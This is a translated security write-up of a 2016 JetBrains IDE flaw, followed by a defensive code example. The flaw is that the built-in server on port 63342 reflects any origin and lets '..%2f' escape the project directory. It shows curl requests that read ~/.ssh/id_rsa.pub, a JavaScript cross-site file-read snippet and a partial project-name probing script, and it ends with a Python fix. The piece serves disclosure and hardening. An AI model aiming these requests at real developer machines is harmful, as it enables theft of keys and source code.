JetBrains Remote Code Execution and Information Disclosure: One POST Request Compromises a Developer's Machine


A novice's translation. Updated 2016-08-30 10:45

0x00 Preface

On the 18th of this month Xuanwu Lab pushed out a notice: on the 15th a vulnerability in JetBrains IDEs that had existed for at least three years was disclosed.

Today I noticed that my todo.txt could fill the whole screen and decided to clean it up; hence this post.

Original report: http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-execution-and-local-file-disclosure-vulnerability-analysis/

I give only a rough overview here; if your English is up to it, I strongly recommend reading the original.

0x01 Overview

Affected platforms: Windows, OS X

Sample IDEs: PyCharm, Android Studio, WebStorm, IntelliJ IDEA

Sample downloads:

- Linux: https://download.jetbrains.com/python/pycharm-community-5.0.4.tar.gz
- OS X: https://download.jetbrains.com/python/pycharm-community-5.0.4.dmg
- Windows: https://download.jetbrains.com/python/pycharm-community-5.0.4.exe

0x02 Initial discovery

My job is to poke at all sorts of interesting things, haha. The weather is nice today; I wonder whether some fun services are quietly running in the background?

```
lsof -P -iTCP | grep LISTEN
...
pycharm 4177 user 289u IPv4 0x81a02fb90b4eef47 0t0 TCP localhost:63342 (LISTEN)
```

Huh? PyCharm is running a service too? What is port 63342 for?

```
$ nmap -A -p 63342 127.0.0.1
# [...]
PORT      STATE SERVICE VERSION
63342/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port63342-TCP:V=6.46%I=7%D=8/2%Time=57A0DD64%P=x86_64-apple-darwin13.1.
SF:0%r(GetRequest,173,"HTTP/1\.1\x20404\x20Not\x20Found\r\ncontent-type:\x
# [...]
```

nmap suggests this may be an HTTP server. Forging a request origin the way the CORS standard describes gives the following response:

```
root@kali:~# curl -v -H "origin http://a.com" "http://127.0.0.1:63342"
* Rebuilt URL to: http://127.0.0.1:63342/
*   Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 63342 (#0)
> GET / HTTP/1.1
> Host: 127.0.0.1:63342
> User-Agent: curl/7.46.0
> Accept: */*
> origin http://a.com
>
< HTTP/1.1 404 Not Found
< content-type: text/html
< content-length: 162
< server: PyCharm Community Edition 5.0.4
< date: Sun, 28 Aug 2016 19:55:39 GMT
< access-control-allow-origin: //a.com
< vary: origin
< access-control-allow-credentials: true
< access-control-allow-headers: content-type
< access-control-allow-headers: accept
< access-control-allow-headers: origin
< access-control-allow-headers: authorization
<
* Connection #0 to host 127.0.0.1 left intact
<!doctype html><title>404 Not Found</title><h1 style="text-align: center">404 Not Found</h1><hr/><p style="text-align: center">PyCharm Community Edition 5.0.4</p>root@kali:~#
```

The access-control-* headers show that requests from any origin are allowed (the supplied origin is reflected back, with credentials permitted). So, can we get any sensitive information out of it?

0x03 Reading project files

I found that this HTTP server is related to WebStorm. WebStorm provides it so that you can preview your code in a browser without setting up a web server yourself;

to trigger it you just click the "view in browser" button, which amounts to visiting http://localhost:63342/<projectname>/<your_file.html> in the browser.

Let's test this: create a project in PyCharm named pycharmTest and create a file named test.txt inside it.

```
root@kali:~# curl -v "http://127.0.0.1:63342/pycharmTest/test.txt"
*   Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 63342 (#0)
> GET /pycharmTest/test.txt HTTP/1.1
> Host: 127.0.0.1:63342
> User-Agent: curl/7.46.0
> Accept: */*
>
< HTTP/1.1 200 OK
< content-type: text/plain
< server: PyCharm Community Edition 5.0.4
< date: Sun, 28 Aug 2016 20:24:51 GMT
< cache-control: private, must-revalidate
< last-modified: Sun, 28 Aug 2016 20:24:37 GMT
< content-length: 12
<
* Connection #0 to host 127.0.0.1 left intact
just for fun
```

So, in other words, we only need to guess the project name and file name, deploy a snippet like this on any site:

```html
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://localhost:63342/testing/something.txt", true);
xhr.onload = function() { alert(xhr.responseText); };
xhr.send();
</script>
```

and trick the target into visiting it to read the source of that file. That looks fairly hard to exploit in practice, though.

Someone is bound to say (well, nobody actually did...):

[Image in the original post]

0x04 Reading outside the project directory

Everyone knows that certain sensitive files live at fixed locations, such as .ssh/id_rsa or /etc/passwd, and that ../ or ..\ can be used to walk up to parent directories.

But requesting ../ directly gives:

```
root@kali:~# curl -v "http://127.0.0.1:63342/pycharmTest/../.ssh/id_rsa.pub "
* Rebuilt URL to: http://127.0.0.1:63342/.ssh/id_rsa.pub
*   Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 63342 (#0)
> GET /.ssh/id_rsa.pub HTTP/1.1
> Host: 127.0.0.1:63342
> User-Agent: curl/7.46.0
> Accept: */*
>
< HTTP/1.1 404 Not Found
< content-type: text/html
< content-length: 162
< server: PyCharm Community Edition 5.0.4
< date: Sun, 28 Aug 2016 20:51:03 GMT
<
* Connection #0 to host 127.0.0.1 left intact
<!doctype html><title>404 Not Found</title><h1 style="text-align: center">404 Not Found</h1><hr/><p style="text-align: center">PyCharm Community Edition 5.0.4</p>
```

It turns out the path gets normalised according to RFC 3986 (note the "Rebuilt URL to" line above, where the ../ segment was collapsed before the request was sent). Luckily, PyCharm's built-in HTTP server does not apply the same handling to a URL-encoded slash (%2f).

So:

```
root@kali:~# curl -v "http://127.0.0.1:63342/pycharmTest/..%2f.ssh/id_rsa.pub "
*   Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 63342 (#0)
> GET /pycharmTest/..%2f.ssh/id_rsa.pub HTTP/1.1
> Host: 127.0.0.1:63342
> User-Agent: curl/7.46.0
> Accept: */*
>
< HTTP/1.1 200 OK
< content-type: application/octet-stream
< server: PyCharm Community Edition 5.0.4
< date: Sun, 28 Aug 2016 20:50:47 GMT
< cache-control: private, must-revalidate
< last-modified: Tue, 26 Jul 2016 12:20:12 GMT
< content-length: 391
<
ssh-rsa AAAA....
* Connection #0 to host 127.0.0.1 left intact
```

Nice!

The only drawback is that you still need to know the project name on the target machine to reach sensitive files; otherwise the server just returns 404.

Guessing the project name also requires a file that is guaranteed to exist, and that is not hard to find: after JetBrains creates a project it generates .idea/workspace.xml.

So it is not hard to write a directory-probing script along these lines:

```javascript
function findLoadedProject(cb) {
    var xhr = new XMLHttpRequest();
    // Let's assume we have a sensible dictionary here.
    var possibleProjectNames = ["foobar", "testing", "bazquux"];
    var tr
```
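The two server-side mistakes shown above are worth seeing fixed side by side: in 0x02 the built-in server reflects any Origin it is given together with access-control-allow-credentials: true, and in 0x04 it normalises ../ but never percent-decodes %2f before deciding which file a request maps to. The Python below is an added example, not PyCharm's or JetBrains' code. It models a minimal project file server over an in-memory file tree with an Origin allow-list and a resolver that decodes before normalising; the ALLOWED_ORIGINS set, the PROJECTS tree and the probe paths are constructed for the demo.

```python
"""Hardened handling for an IDE-style built-in file server (added example).

Models the two fixes the analysis above calls for:
  1. an Origin allow-list instead of reflecting any Origin header, and
  2. percent-decoding the request path *before* normalising it, so that
     "..%2f" is treated exactly like "../" and cannot escape the project.
"""
from __future__ import annotations

import posixpath
from urllib.parse import unquote

# Constructed allow-list: only the IDE's own local origins get CORS headers.
ALLOWED_ORIGINS = frozenset({"http://localhost:63342", "http://127.0.0.1:63342"})

# Constructed in-memory project tree: project name -> {relative path: content}.
PROJECTS = {
    "pycharmTest": {
        "test.txt": "just for fun",
        ".idea/workspace.xml": '<project version="4" />',
    }
}

NOT_FOUND = "404 Not Found"


def cors_headers(origin: str | None) -> dict[str, str]:
    """Emit CORS headers only for allow-listed origins.

    The vulnerable server echoed whatever Origin it received and added
    access-control-allow-credentials: true, which lets any site read the
    response. Returning no CORS headers at all makes the browser block
    the cross-site read.
    """
    if origin is None or origin not in ALLOWED_ORIGINS:
        return {}
    return {
        "access-control-allow-origin": origin,
        "access-control-allow-credentials": "true",
        "vary": "origin",
    }


def resolve_project_path(request_path: str) -> tuple[str, str] | None:
    """Map a raw request path to (project, relative file); None if malformed.

    Decoding happens first, so "%2f" and "%2e" become "/" and "." before
    posixpath.normpath collapses "." and ".." segments. On an absolute path
    normpath also drops any ".." that would climb above the root, so a
    traversal sequence can only change which *project name* is looked up;
    it can never produce a file path outside that project's directory.
    """
    decoded = unquote(request_path)
    # NUL bytes and backslashes have no place in a project URL; reject them.
    if "\x00" in decoded or "\\" in decoded:
        return None
    normalised = posixpath.normpath(decoded)
    if not normalised.startswith("/"):
        return None
    parts = normalised.lstrip("/").split("/", 1)
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return None
    project, relative = parts
    return project, relative


def handle_get(path: str, origin: str | None = None) -> tuple[int, dict[str, str], str]:
    """Tiny GET handler returning (status, headers, body)."""
    headers = {"content-type": "text/plain"}
    headers.update(cors_headers(origin))
    resolved = resolve_project_path(path)
    if resolved is None:
        return 404, headers, NOT_FOUND
    project, relative = resolved
    body = PROJECTS.get(project, {}).get(relative)
    if body is None:
        return 404, headers, NOT_FOUND
    return 200, headers, body


if __name__ == "__main__":
    # Constructed probes: a legitimate file, then the three traversal spellings
    # from the analysis (plain ../, encoded ..%2f, fully encoded %2e%2e).
    for probe in ("/pycharmTest/test.txt", "/pycharmTest/../.ssh/id_rsa.pub",
                  "/pycharmTest/..%2f.ssh/id_rsa.pub", "/pycharmTest/%2e%2e/x"):
        status, hdrs, body = handle_get(probe, origin="http://a.com")
        print(f"{probe:40} -> {status} {body!r} cors={'access-control-allow-origin' in hdrs}")
```

The ordering inside resolve_project_path is the whole point: decode once, then normalise, then split. A server that normalises first and decodes later (or that hands the still-encoded segment to the filesystem) lets "..%2f" through exactly as the curl session above shows. Note that an origin which is not on the allow-list still receives the file if the path is valid, but without CORS headers the browser refuses to hand the body to the calling page.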
